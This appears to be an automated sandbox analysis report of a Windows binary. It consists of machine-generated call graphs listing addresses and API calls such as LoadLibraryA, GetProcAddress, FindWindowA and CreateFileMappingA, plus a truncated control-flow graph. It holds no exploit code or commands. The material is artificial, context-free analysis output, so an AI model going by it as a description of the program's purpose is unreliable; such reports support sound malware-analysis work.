API calls 2 library calls 51362->51404 51382 111077a0 std::locale::facet::_Facet_Register 22 API calls 51363->51382 51363->51392 51372 111583b1 _malloc 15 API calls 51364->51372 51380 111077a0 std::locale::facet::_Facet_Register 22 API calls 51365->51380 51365->51392 51412 110634b0 SetEvent 51366->51412 51377 11059e50 6 API calls 51367->51377 51405 11027f50 6 API calls 51368->51405 51369->51392 51403 11085330 EnterCriticalSection LeaveCriticalSection 51369->51403 51410 11063480 SetEvent 51370->51410 51411 11063550 SetEvent 51371->51411 51372->51392 51377->51392 51379 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51383 1106dd06 51379->51383 51386 1106dc50 51380->51386 51381 1106db4f 51381->51392 51385 1106dbf2 51382->51385 51389 1106d9b9 51384->51389 51384->51392 51393 1106d9db 51384->51393 51397 1106dc10 51385->51397 51406 1106d5e0 24 API calls 51385->51406 51395 1106dc70 51386->51395 51408 1106d6c0 23 API calls 51386->51408 51388->51392 51394 1106d8d8 wsprintfA 51388->51394 51401 1105f740 24 API calls std::locale::facet::_Facet_Register 51389->51401 51392->51379 51393->51392 51402 1105f740 24 API calls std::locale::facet::_Facet_Register 51393->51402 51394->51388 51409 111075f0 InterlockedDecrement 51395->51409 51407 111075f0 InterlockedDecrement 51397->51407 51401->51392 51402->51392 51403->51392 51404->51381 51406->51397 51407->51392 51408->51395 51409->51392 51410->51392 51411->51392 51412->51392 51413 10705cdd 51414 10705cf0 51413->51414 51418 10705cf9 51413->51418 51422 10705d21 51414->51422 51452 10702c20 DisableThreadLibraryCalls 51414->51452 51417 10705d2d 51419 10705d41 51417->51419 51420 10705c04 105 API calls 51417->51420 51417->51422 51418->51414 51418->51422 51423 10705c04 51418->51423 51421 10705c04 105 API calls 51419->51421 51419->51422 51420->51419 51421->51422 51424 10705c11 GetVersion 51423->51424 51425 10705c99 51423->51425 51453 10705f67 HeapCreate 51424->51453 51427 10705ccb 51425->51427 51428 10705c9f 51425->51428 51429 10705c64 51427->51429 51475 1070875c 31 API calls ___free_lc_time 51427->51475 51428->51429 51432 10705cba 51428->51432 51471 10709333 32 API calls 51428->51471 51429->51414 51430 10705c23 51430->51429 51465 10708670 37 API calls 51430->51465 51472 107095de 30 API calls ___free_lc_time 51432->51472 51436 10705cbf 51473 107086c4 35 API calls 51436->51473 51437 10705c5b 51439 10705c68 GetCommandLineA 51437->51439 51440 10705c5f 51437->51440 51467 10709938 37 API calls 2 library calls 51439->51467 51466 10705fc4 6 API calls 51440->51466 51442 10705cc4 51474 10705fc4 6 API calls 51442->51474 51444 10705c78 51468 10709422 34 API calls ___free_lc_time 51444->51468 51447 10705c82 51469 107096eb 49 API calls ___free_lc_time 51447->51469 51449 10705c87 51470 10709632 48 API calls 2 library calls 51449->51470 51451 10705c8c 51451->51429 51452->51417 51454 10705f87 51453->51454 51455 10705fbd 51453->51455 51476 10705e1f 57 API calls _wctomb_s 51454->51476 51455->51430 51457 10705f8c 51458 10705fa3 51457->51458 51459 10705f96 51457->51459 51461 10705fc0 51458->51461 51478 107070a7 5 API calls ___free_lc_time 51458->51478 51477 1070613e HeapAlloc 51459->51477 51461->51430 51462 10705fa0 51462->51461 51464 10705fb1 HeapDestroy 51462->51464 51464->51455 51465->51437 51466->51429 51467->51444 51468->51447 51469->51449 51470->51451 51471->51432 51472->51436 51473->51442 51474->51429 51475->51429 51476->51457 51477->51462 51478->51462 51479 1000d010 51480 1000d034 51479->51480 51481 1000d538 51479->51481 51564 10273a9d 51480->51564 51485 1000d08f 51486 1000ce70 12 API calls 51485->51486 51487 1000d0a3 51486->51487 51488 1000ce70 12 API calls 51487->51488 51489 1000d0b7 51488->51489 51490 1000ce70 12 API calls 51489->51490 51491 1000d0cb 51490->51491 51492 1000ce70 12 API calls 51491->51492 51493 1000d0df 51492->51493 51494 1000ce70 12 API calls 51493->51494 51495 1000d0f3 51494->51495 51496 1000ce70 12 API calls 51495->51496 51497 1000d107 51496->51497 51498 1000ce70 12 API calls 51497->51498 51499 1000d127 51498->51499 51500 1000ce70 12 API calls 51499->51500 51501 1000d147 51500->51501 51502 1000ce70 12 API calls 51501->51502 51503 1000d15b 51502->51503 51504 1000ce70 12 API calls 51503->51504 51505 1000d16f 51504->51505 51506 1000ce70 12 API calls 51505->51506 51507 1000d18f 51506->51507 51508 1000ce70 12 API calls 51507->51508 51509 1000d1af 51508->51509 51510 1000ce70 12 API calls 51509->51510 51511 1000d1c3 51510->51511 51512 1000ce70 12 API calls 51511->51512 51513 1000d1e3 51512->51513 51514 1000ce70 12 API calls 51513->51514 51515 1000d203 51514->51515 51516 1000ce70 12 API calls 51515->51516 51517 1000d217 51516->51517 51518 1000ce70 12 API calls 51517->51518 51519 1000d22b 51518->51519 51520 1000ce70 12 API calls 51519->51520 51521 1000d23f 51520->51521 51522 1000ce70 12 API calls 51521->51522 51523 1000d253 51522->51523 51524 1000ce70 12 API calls 51523->51524 51525 1000d267 51524->51525 51526 1000ce70 12 API calls 51525->51526 51527 1000d27b 51526->51527 51528 1000ce70 12 API calls 51527->51528 51529 1000d28f 51528->51529 51530 1000ce70 12 API calls 51529->51530 51531 1000d2a3 51530->51531 51532 1000ce70 12 API calls 51531->51532 51533 1000d2b7 51532->51533 51534 1000ce70 12 API calls 51533->51534 51535 1000d2cb 51534->51535 51536 1000ce70 12 API calls 51535->51536 51537 1000d2df 51536->51537 51538 1000ce70 12 API calls 51537->51538 51539 1000d2f3 51538->51539 51540 1000ce70 12 API calls 51539->51540 51541 1000d307 51540->51541 51542 1000ce70 12 API calls 51541->51542 51543 1000d31b 51542->51543 51544 1000ce70 12 API calls 51543->51544 51545 1000d32f 51544->51545 51546 1000ce70 12 API calls 51545->51546 51547 1000d343 51546->51547 51548 1000ce70 12 API calls 51547->51548 51549 1000d357 51548->51549 51550 1000ce70 12 API calls 51549->51550 51551 1000d36b 51550->51551 51552 1000ce70 12 API calls 51551->51552 51553 1000d37f 51552->51553 51554 1000ce70 12 API calls 51553->51554 51555 1000d393 51554->51555 51556 1000ce70 12 API calls 51555->51556 51557 1000d3a7 51556->51557 51557->51481 51558 1000d3b1 GetCurrentDirectoryW 51557->51558 51559 1000d416 51558->51559 51559->51559 51560 1000d523 51559->51560 51563 1000d49d _strncat 51559->51563 51560->51481 51561 1000d52a SetCurrentDirectoryW 51560->51561 51561->51481 51562 1000d4b4 LoadLibraryA 51562->51563 51563->51559 51563->51562 51579 10273a6d 51564->51579 51567 1000ce70 51568 10273a9d 8 API calls 51567->51568 51569 1000ce88 51568->51569 51570 10273a9d 8 API calls 51569->51570 51571 1000ce96 51570->51571 51573 1000cf93 51571->51573 51574 1000ceab 51571->51574 51572 1000cfa7 FreeImage_OutputMessageProc 51572->51485 51573->51572 51575 1000cf66 51574->51575 51591 1000e690 8 API calls 51574->51591 51575->51485 51577 1000cf54 51592 1000e6b0 InitializeCriticalSectionAndSpinCount RaiseException RtlFreeHeap GetLastError 51577->51592 51580 10273a72 51579->51580 51581 1000d045 51580->51581 51583 10273a8e 51580->51583 51588 1028e7b5 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 51580->51588 51581->51481 51581->51567 51584 10274fb9 51583->51584 51589 1027832b RaiseException 51583->51589 51590 1027832b RaiseException 51584->51590 51587 10274fd6 51588->51580 51589->51584 51590->51587 51591->51577 51592->51575 51593 1110df20 51594 1113b570 21 API calls 51593->51594 51595 1110df3e 51594->51595 51596 1110df65 51595->51596 51597 1110df48 51595->51597 51600 1113b380 21 API calls 51595->51600 51596->51597 51598 1110df74 CoInitialize CoCreateInstance 51596->51598 51599 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51597->51599 51601 1110dfa4 LoadLibraryA 51598->51601 51610 1110df99 51598->51610 51602 1110df56 51599->51602 51600->51596 51603 1110dfc0 GetProcAddress 51601->51603 51601->51610 51604 1110dfd0 SHGetSettings 51603->51604 51605 1110dfe4 FreeLibrary 51603->51605 51604->51605 51605->51610 51606 1110e081 CoUninitialize 51607 1110e087 51606->51607 51608 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51607->51608 51609 1110e096 51608->51609 51610->51606 51610->51607 51611 10001bf0 51612 10001dfd 51611->51612 51613 10001c17 51611->51613 51614 10001df2 51613->51614 51622 10001c31 51613->51622 51627 1027c531 51613->51627 51615 1027c531 ___vcrt_freefls@4 2 API calls 51614->51615 51615->51612 51617 10001d7c 51619 10001dd8 _FreeImage_Unload 51617->51619 51623 1027c466 51619->51623 51621 1027c531 RtlFreeHeap GetLastError ___vcrt_freefls@4 51621->51622 51622->51617 51622->51621 51630 100045d0 11 API calls 51622->51630 51624 1027c46b 51623->51624 51625 1027c482 51624->51625 51626 1027c531 ___vcrt_freefls@4 2 API calls 51624->51626 51625->51614 51626->51625 51631 1029012c 51627->51631 51629 1027c549 51629->51622 51630->51622 51632 10290160 _free 51631->51632 51633 10290137 RtlFreeHeap 51631->51633 51632->51629 51633->51632 51634 1029014c 51633->51634 51635 10290152 GetLastError 51634->51635 51635->51632 51636 11133920 51637 11133929 51636->51637 51638 1113392e 51636->51638 51640 11130aa0 51637->51640 51641 11130ad7 51640->51641 51642 11130adc 51640->51642 51848 11027e30 10 API calls 51641->51848 51736 1112baf0 51642->51736 51648 11130bcd 51652 11130bfe FindWindowA 51648->51652 51657 11130c96 51648->51657 51650 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51653 1113101e 51650->51653 51651 11130b18 IsWindow IsWindowVisible 51654 11130b43 51651->51654 51655 11130c13 IsWindowVisible 51652->51655 51652->51657 51653->51638 51659 11059e50 6 API calls 51654->51659 51656 11130c1a 51655->51656 51655->51657 51656->51657 51664 11130640 179 API calls 51656->51664 51660 11059e50 6 API calls 51657->51660 51665 11130cbb 51657->51665 51658 11130e6b 51663 11130e85 51658->51663 51668 11130640 179 API calls 51658->51668 51662 11130b5f IsWindowVisible 51659->51662 51678 11130ce3 51660->51678 51661 11059e50 6 API calls 51666 11130e58 51661->51666 51662->51648 51667 11130b6d 51662->51667 51670 11130ea2 51663->51670 51918 110678a0 61 API calls 51663->51918 51669 11130c3b IsWindowVisible 51664->51669 51665->51658 51665->51661 51666->51658 51672 11130e5d 51666->51672 51667->51648 51673 11130b75 51667->51673 51668->51663 51669->51657 51674 11130c4a IsIconic 51669->51674 51680 11130eb8 51670->51680 51681 11130eaf 51670->51681 51917 1102b940 137 API calls 51672->51917 51683 11130b7f GetForegroundWindow 51673->51683 51674->51657 51675 11130c5b GetForegroundWindow 51674->51675 51915 11129200 ShowWindow 51675->51915 51678->51665 51679 11130d30 51678->51679 51685 1107d140 IsDBCSLeadByte 51678->51685 51687 111395a0 8 API calls 51679->51687 51688 11130ec2 51680->51688 51689 11130ece 51680->51689 51919 11129a80 18 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 51681->51919 51682 11130e66 51682->51658 51690 11130bba 51683->51690 51691 11130b8e EnableWindow 51683->51691 51684 11130c6a 51916 11129200 ShowWindow 51684->51916 51685->51679 51694 11130d42 51687->51694 51700 11130ecc 51688->51700 51920 11129820 62 API calls 51688->51920 51921 11129750 63 API calls 51689->51921 51690->51648 51697 11130bc6 SetForegroundWindow 51690->51697 51913 11129200 ShowWindow 51691->51913 51693 11130eb5 51693->51680 51698 11130d4f GetLastError 51694->51698 51708 11130d5d 51694->51708 51697->51648 51698->51708 51703 11130f82 51700->51703 51704 11130eeb 51700->51704 51735 11130f76 51700->51735 51701 11130ba5 51914 11129200 ShowWindow 51701->51914 51702 11130380 131 API calls 51720 11130fcf 51702->51720 51703->51735 51925 1103de00 InterlockedDecrement 51703->51925 51714 111077a0 std::locale::facet::_Facet_Register 22 API calls 51704->51714 51704->51735 51706 11130c87 EnableWindow 51706->51657 51707 11130c71 51707->51706 51710 11130c80 SetForegroundWindow 51707->51710 51708->51665 51713 11130dae 51708->51713 51716 1107d140 IsDBCSLeadByte 51708->51716 51709 11130bac EnableWindow 51709->51690 51710->51706 51711 11130ff6 51711->51650 51718 111395a0 8 API calls 51713->51718 51717 11130f0c 51714->51717 51715 11130f91 51926 1103de80 InterlockedDecrement 51715->51926 51716->51713 51721 11130f41 51717->51721 51722 11130f1e 51717->51722 51723 11130dc0 51718->51723 51720->51711 51844 111385d0 51720->51844 51923 1103ddc0 25 API calls 51721->51923 51922 110534a0 33 API calls 51722->51922 51723->51665 51727 11130dc7 GetLastError 51723->51727 51724 11130f9c 51927 1103dea0 InterlockedDecrement 51724->51927 51727->51665 51729 11130f30 51729->51721 51730 11130fa7 51928 1103de60 InterlockedDecrement 51730->51928 51733 11130f55 51924 1103de20 25 API calls 51733->51924 51735->51702 51737 1112bb32 51736->51737 51738 1112be54 51736->51738 51740 11059e50 6 API calls 51737->51740 51739 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51738->51739 51741 1112be6c 51739->51741 51742 1112bb52 51740->51742 51775 1112b5d0 51741->51775 51742->51738 51743 1112bb5a GetLocalTime 51742->51743 51744 1112bb70 51743->51744 51745 1112bb91 LoadLibraryA 51743->51745 51744->51745 51929 11009840 LoadLibraryA 51745->51929 51747 1112bbe5 51930 11015b30 LoadLibraryA 51747->51930 51749 1112bbf0 GetCurrentProcess 51750 1112bc15 GetProcAddress 51749->51750 51751 1112bc2d 51749->51751 51750->51751 51752 1112bc36 SetLastError 51750->51752 51753 1112bc62 51751->51753 51754 1112bc48 GetProcAddress 51751->51754 51752->51751 51756 1112bc70 GetProcAddress 51753->51756 51757 1112bc8a 51753->51757 51754->51753 51755 1112bc97 SetLastError 51754->51755 51755->51756 51756->51757 51758 1112bca4 SetLastError 51756->51758 51759 1112bcaf GetProcAddress 51757->51759 51758->51759 51760 1112bccf SetLastError 51759->51760 51763 1112bcc1 51759->51763 51760->51763 51761 1112be3a FreeLibrary 51762 1112be3d 51761->51762 51764 1112be47 FreeLibrary 51762->51764 51765 1112be4a 51762->51765 51767 11059e50 6 API calls 51763->51767 51774 1112be14 51763->51774 51764->51765 51765->51738 51766 1112be51 FreeLibrary 51765->51766 51766->51738 51768 1112bd9e 51767->51768 51769 11059e50 6 API calls 51768->51769 51770 1112bdc6 51769->51770 51771 11059e50 6 API calls 51770->51771 51772 1112bded 51771->51772 51773 11059e50 6 API calls 51772->51773 51773->51774 51774->51761 51774->51762 51777 1112b5fd 51775->51777 51776 1112bab9 51776->51648 51776->51711 51849 11130640 51776->51849 51777->51776 51778 1112b697 51777->51778 51780 1112b6ae 51777->51780 51931 11027f50 6 API calls 51778->51931 51781 1112b6ab 51780->51781 51782 1112b6ec 51780->51782 51781->51780 51932 11027f50 6 API calls 51781->51932 51783 1107d280 15 API calls 51782->51783 51785 1112b6fa 51783->51785 51791 1112b711 51785->51791 51933 110093d0 6 API calls std::locale::facet::_Facet_Register 51785->51933 51788 1112b70b 51789 1107d140 IsDBCSLeadByte 51788->51789 51789->51791 51790 1112b85e 51796 1112b891 51790->51796 51797 1112b87a 51790->51797 51794 1112b78f 51791->51794 51934 1101b9b0 6 API calls std::locale::facet::_Facet_Register 51791->51934 51793 1112b82b 51793->51794 51935 11027f50 6 API calls 51793->51935 51794->51790 51794->51793 51799 1112b88e 51796->51799 51801 1112b8bc 51796->51801 51803 1112b904 51796->51803 51936 11027f50 6 API calls 51797->51936 51799->51796 51937 11027f50 6 API calls 51799->51937 51800 1112b950 _free 51807 1112b968 51800->51807 51804 1107d210 2 API calls 51801->51804 51803->51800 51811 1112b922 51803->51811 51812 1112b939 51803->51812 51816 1112b99c 51803->51816 51813 1112b8c7 51804->51813 51805 1112b9e6 51820 1112b9e3 51805->51820 51825 1112ba15 51805->51825 51835 1112ba71 51805->51835 51806 1112b9cf 51942 11027f50 6 API calls 51806->51942 51808 1112b983 __strdup 51807->51808 51809 1112b96c 51807->51809 51808->51816 51941 11027f50 6 API calls 51809->51941 51940 11027f50 6 API calls 51811->51940 51819 1107d280 15 API calls 51812->51819 51813->51803 51829 1112b8f5 51813->51829 51830 1112b8de 51813->51830 51816->51805 51816->51806 51818 110c9920 7 API calls 51823 1112baaa 51818->51823 51824 1112b949 51819->51824 51820->51805 51943 11027f50 6 API calls 51820->51943 51826 110c9920 7 API calls 51823->51826 51824->51800 51824->51816 51828 1107d280 15 API calls 51825->51828 51826->51776 51833 1112ba23 51828->51833 51939 110c9960 6 API calls 2 library calls 51829->51939 51938 11027f50 6 API calls 51830->51938 51833->51835 51837 1112ba38 51833->51837 51838 1112ba4f 51833->51838 51835->51818 51944 11027f50 6 API calls 51837->51944 51839 1107d140 IsDBCSLeadByte 51838->51839 51841 1112ba5a 51839->51841 51841->51835 51945 110093d0 6 API calls std::locale::facet::_Facet_Register 51841->51945 51845 111385ef 51844->51845 51846 111385da 51844->51846 51845->51711 51946 11137c50 51846->51946 51848->51642 51850 11130a7f 51849->51850 51853 1113065d 51849->51853 51851 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51850->51851 51852 11130a8e 51851->51852 51852->51651 51853->51850 51854 1113b380 21 API calls 51853->51854 51855 1113069c 51854->51855 51855->51850 51856 11059e50 6 API calls 51855->51856 51857 111306cb 51856->51857 52017 11124a30 51857->52017 51859 11130810 PostMessageA 51860 11130825 51859->51860 51871 11130835 51860->51871 52024 111075f0 InterlockedDecrement 51860->52024 51861 11059e50 6 API calls 51862 1113080c 51861->51862 51862->51859 51862->51860 51864 11130893 51869 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51864->51869 51865 111308ae 51866 111391f0 104 API calls 51865->51866 51868 111308b3 51866->51868 51867 1113071b 51874 1113bd30 4 API calls 51867->51874 51875 111307bb 51867->51875 51870 1113ce00 13 API calls 51868->51870 51872 111308aa 51869->51872 51873 111308ba SetWindowTextA 51870->51873 51871->51864 51871->51865 51872->51651 51877 111308d6 51873->51877 51874->51875 51875->51859 51875->51861 51876 11130934 51878 11130a0c 51876->51878 51887 11130948 51876->51887 51877->51876 51880 1113091c 51877->51880 51879 11130a2d 51878->51879 51884 11130a14 51878->51884 52030 110f12c0 16 API calls 51879->52030 52025 11129200 ShowWindow 51880->52025 51881 1113096c 52027 110f12c0 16 API calls 51881->52027 52029 11129200 ShowWindow 51884->52029 51886 11130a38 51886->51850 51891 11130a3c IsWindowVisible 51886->51891 51887->51881 51895 11130962 51887->51895 51888 11130977 51888->51850 51892 1113097f IsWindowVisible 51888->51892 51889 1113092c 51889->51876 51891->51850 51894 11130a4e IsWindowVisible 51891->51894 51892->51850 51896 11130996 51892->51896 51893 11130a2a 51893->51879 51894->51850 51897 11130a5b EnableWindow 51894->51897 52026 11129200 ShowWindow 51895->52026 51899 1113b380 21 API calls 51896->51899 52031 11129200 ShowWindow 51897->52031 51902 111309a1 51899->51902 51901 11130969 51901->51881 51902->51850 51904 111309ac GetForegroundWindow IsWindowVisible 51902->51904 51903 11130a72 EnableWindow 51903->51850 51905 111309d1 51904->51905 51906 111309c6 EnableWindow 51904->51906 52028 11129200 ShowWindow 51905->52028 51906->51905 51908 111309d8 51909 111309ee EnableWindow 51908->51909 51910 111309e7 SetForegroundWindow 51908->51910 51911 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51909->51911 51910->51909 51912 11130a08 51911->51912 51912->51651 51913->51701 51914->51709 51915->51684 51916->51707 51917->51682 51918->51670 51919->51693 51920->51700 51921->51700 51922->51729 51923->51733 51924->51735 51925->51715 51926->51724 51927->51730 51928->51735 51929->51747 51930->51749 51933->51788 51934->51794 51939->51803 51945->51835 51947 11137c8f 51946->51947 51974 11137c88 51946->51974 51948 111077a0 std::locale::facet::_Facet_Register 22 API calls 51947->51948 51950 11137c96 51948->51950 51949 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51951 111385c8 51949->51951 51952 11137cc6 51950->51952 51953 1105d0a0 22 API calls 51950->51953 51951->51845 51954 1105d820 25 API calls 51952->51954 51953->51952 51955 11137d02 51954->51955 51956 11137d09 RegCloseKey 51955->51956 51957 11137d10 51955->51957 51956->51957 51958 1113b0a0 122 API calls 51957->51958 51959 11137d2c 51958->51959 51960 111395a0 8 API calls 51959->51960 51961 11137d40 51960->51961 51962 11137d57 51961->51962 51963 1105ee80 169 API calls 51961->51963 51964 111077a0 std::locale::facet::_Facet_Register 22 API calls 51962->51964 51963->51962 51966 11137d5e 51964->51966 51965 111077a0 std::locale::facet::_Facet_Register 22 API calls 51967 11137d93 51965->51967 51966->51965 51968 111077a0 std::locale::facet::_Facet_Register 22 API calls 51967->51968 51984 11137dc8 51968->51984 51969 11059e50 6 API calls 51988 11138181 51969->51988 51970 11138145 51970->51969 51970->51974 51971 1107d280 15 API calls 51971->51984 51973 11138343 EnterCriticalSection 51975 11138361 51973->51975 51974->51949 51976 1113838a LeaveCriticalSection 51975->51976 51980 11029350 26 API calls 51975->51980 51981 111383dd 51976->51981 51985 1113839d 51976->51985 51977 11138313 51977->51973 52012 11063910 61 API calls 51977->52012 51978 11129970 15 API calls 51978->51984 51982 11138387 51980->51982 51983 1112b5d0 25 API calls 51981->51983 51982->51976 51991 111383e7 51983->51991 51984->51970 51984->51971 51984->51978 51986 1107d330 15 API calls 51984->51986 51985->51981 51987 11133750 198 API calls 51985->51987 51986->51984 51989 111383b0 51987->51989 52011 11063910 61 API calls 51988->52011 51990 11137810 548 API calls 51989->51990 51992 111383b6 51990->51992 52013 110c90c0 6 API calls std::locale::facet::_Facet_Register 51991->52013 51992->51981 51993 110258f0 175 API calls 51992->51993 51993->51981 51995 110c9920 7 API calls 51997 11138519 51995->51997 51996 1113845b 51999 11138482 51996->51999 52000 11138499 51996->52000 52005 111384de 51996->52005 51998 110c9920 7 API calls 51997->51998 51998->51974 52014 11027f50 6 API calls 51999->52014 52002 1107d280 15 API calls 52000->52002 52004 111384aa 52002->52004 52004->52005 52015 110093d0 6 API calls std::locale::facet::_Facet_Register 52004->52015 52005->51995 52007 111384be 52008 1107d140 IsDBCSLeadByte 52007->52008 52009 111384c4 52008->52009 52009->52005 52016 110093d0 6 API calls std::locale::facet::_Facet_Register 52009->52016 52011->51977 52012->51977 52013->51996 52015->52007 52016->52005 52018 11124a4c 52017->52018 52019 11124a87 52018->52019 52020 11124a74 52018->52020 52032 110678a0 61 API calls 52019->52032 52022 1113ce00 13 API calls 52020->52022 52023 11124a7f 52022->52023 52023->51867 52024->51871 52025->51889 52026->51901 52027->51888 52028->51908 52029->51893 52030->51886 52031->51903 52032->52023 52033 1115caa3 52036 1115ca24 52033->52036 52035 1115cab3 52037 1115ca4b 52036->52037 52040 1115ca31 52036->52040 52038 1115ca54 GetFileAttributesA 52037->52038 52037->52040 52039 1115ca62 GetLastError __dosmaperr 52038->52039 52041 1115ca47 52038->52041 52039->52041 52043 111636c4 11 API calls _strcpy_s 52040->52043 52041->52035 52043->52041 52044 11083b10 52049 11157580 52044->52049 52050 11083b34 InitializeCriticalSection 52049->52050 52051 11083980 52050->52051 52052 1113bd30 4 API calls 52051->52052 52054 110839b3 52052->52054 52053 11083ab8 52054->52053 52054->52054 52055 111077a0 std::locale::facet::_Facet_Register 22 API calls 52054->52055 52056 11083a09 52055->52056 52057 11083a4d 52056->52057 52058 11083a36 52056->52058 52064 11081e80 52057->52064 52093 11027f50 6 API calls 52058->52093 52062 1113bd30 4 API calls 52063 11083a58 52062->52063 52063->52053 52063->52062 52063->52063 52065 11081e9b 52064->52065 52066 11081e9f 52065->52066 52067 11081eb0 52065->52067 52068 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52066->52068 52069 1113aeb0 120 API calls 52067->52069 52070 11081eac 52068->52070 52071 11081eb7 52069->52071 52070->52063 52071->52071 52072 11081edb LoadLibraryA 52071->52072 52073 11081f79 GetProcAddress 52072->52073 52074 11081f14 52072->52074 52075 1108201c 52073->52075 52076 11081f94 GetProcAddress 52073->52076 52077 11081f1d GetModuleFileNameA 52074->52077 52078 11081f70 52074->52078 52081 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52075->52081 52076->52075 52080 11081fa5 GetProcAddress 52076->52080 52079 1107d210 2 API calls 52077->52079 52078->52073 52078->52075 52082 11081f3e LoadLibraryA 52079->52082 52080->52075 52083 11081fb6 GetProcAddress 52080->52083 52084 1108202a 52081->52084 52082->52078 52083->52075 52085 11081fc7 GetProcAddress 52083->52085 52084->52063 52085->52075 52086 11081fd8 GetProcAddress 52085->52086 52086->52075 52087 11081fe9 GetProcAddress 52086->52087 52087->52075 52088 11081ffa GetProcAddress 52087->52088 52088->52075 52089 1108200b GetProcAddress 52088->52089 52089->52075 52090 1108202e 52089->52090 52091 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 52090->52091 52092 11082040 52091->52092 52092->52063 52094 1115eecd 52095 1115eedd 52094->52095 52096 1115eed8 ___security_init_cookie 52094->52096 52099 1115edd7 52095->52099 52096->52095 52098 1115eeeb 52100 1115ede3 52099->52100 52101 1115ee80 52100->52101 52105 1115ee30 52100->52105 52107 1115ec73 52100->52107 52101->52098 52103 1115ee60 52103->52101 52104 1115ec73 __CRT_INIT@12 40 API calls 52103->52104 52104->52101 52105->52101 52105->52103 52106 1115ec73 __CRT_INIT@12 40 API calls 52105->52106 52106->52103 52108 1115ec7f 52107->52108 52109 1115ec87 52108->52109 52110 1115ed01 52108->52110 52135 11162c90 HeapCreate 52109->52135 52112 1115ed07 52110->52112 52113 1115ed62 52110->52113 52117 1115ec90 52112->52117 52121 1115ed2a __ioterm __mtterm 52112->52121 52114 1115ed67 ___set_flsgetvalue 52113->52114 52115 1115edc0 52113->52115 52118 1115f57e __calloc_crt 2 API calls 52114->52118 52115->52117 52154 111610be TlsGetValue TlsGetValue DecodePointer __freefls TlsSetValue 52115->52154 52116 1115ec8c 52116->52117 52136 1116112c GetModuleHandleW 52116->52136 52117->52105 52119 1115ed78 52118->52119 52119->52117 52123 1115ed84 DecodePointer 52119->52123 52121->52117 52128 1115ed99 52123->52128 52124 1115ec9c 52124->52117 52125 1115eca7 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA __ioinit 52124->52125 52126 1115ecd1 __setargv 52125->52126 52127 1115ecca __mtterm 52125->52127 52129 1115ecfa __ioterm 52126->52129 52130 1115ecda __setenvp 52126->52130 52127->52117 52131 1115edb4 _free 52128->52131 52132 1115ed9d 52128->52132 52129->52127 52130->52129 52133 1115ece3 __cinit 52130->52133 52131->52117 52134 1115eda4 GetCurrentThreadId 52132->52134 52133->52117 52133->52129 52134->52117 52135->52116 52137 11161140 __mtterm 52136->52137 52138 11161149 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 52136->52138 52137->52124 52139 11161193 TlsAlloc 52138->52139 52141 111612a2 52139->52141 52142 111611e1 TlsSetValue 52139->52142 52141->52124 52142->52141 52143 111611f2 __init_pointers EncodePointer EncodePointer EncodePointer EncodePointer 52142->52143 52144 11161236 52143->52144 52145 1116129d __mtterm 52144->52145 52146 1116123a DecodePointer 52144->52146 52145->52141 52147 1116124f 52146->52147 52147->52145 52148 1115f57e __calloc_crt 2 API calls 52147->52148 52149 11161265 52148->52149 52149->52145 52150 1116126d DecodePointer 52149->52150 52151 1116127e 52150->52151 52151->52145 52152 11161282 52151->52152 52153 1116128a GetCurrentThreadId 52152->52153 52153->52141 52154->52117

                                                                                                    Executed Functions

                                                                                                    Function 11098E70 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 671 11098e70-11098ed2 call 11098670 674 11098ed8-11098efb call 11098130 671->674 675 110994f0 671->675 681 11098f01-11098f15 LocalAlloc 674->681 682 11099064-11099066 674->682 677 110994f2-1109950d call 11157561 675->677 683 11098f1b-11098f4d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 681->683 684 110994e5-110994eb call 110981c0 681->684 685 11098ff6-1109901b CreateFileMappingA 682->685 688 11098fda-11098ff0 683->688 689 11098f53-11098f7e call 110980a0 call 110980e0 683->689 684->675 686 11099068-1109907b GetLastError 685->686 687 1109901d-1109903d GetLastError call 1100d7e0 685->687 693 1109907d 686->693 694 11099082-11099099 MapViewOfFile 686->694 700 11099048-11099050 687->700 701 1109903f-11099046 LocalFree 687->701 688->685 720 11098fc9-11098fd1 689->720 721 11098f80-11098fb6 GetSecurityDescriptorSacl 689->721 693->694 697 1109909b-110990b6 call 1100d7e0 694->697 698 110990d7-110990df 694->698 714 110990b8-110990b9 LocalFree 697->714 715 110990bb-110990c3 697->715 702 11099181-11099193 698->702 703 110990e5-110990fe GetModuleFileNameA 698->703 710 11099052-11099053 LocalFree 700->710 711 11099055-1109905f 700->711 701->700 706 110991d9-110991f2 call 11157580 GetTickCount 702->706 707 11099195-11099198 702->707 708 1109919d-110991b8 call 1100d7e0 703->708 709 11099104-1109910d 703->709 732 110991f4-110991f9 706->732 716 1109927f-110992e3 GetCurrentProcessId GetModuleFileNameA call 11098500 707->716 736 110991ba-110991bb LocalFree 708->736 737 110991bd-110991c5 708->737 709->708 717 11099113-11099116 709->717 710->711 719 110994de-110994e0 call 110985b0 711->719 714->715 724 110990c8-110990d2 715->724 725 110990c5-110990c6 LocalFree 715->725 741 110992eb-11099302 CreateEventA 716->741 742 110992e5 716->742 727 11099159-1109917c call 1100d7e0 call 110985b0 717->727 728 11099118-1109911c 717->728 719->684 720->688 722 11098fd3-11098fd4 FreeLibrary 720->722 721->720 731 11098fb8-11098fc3 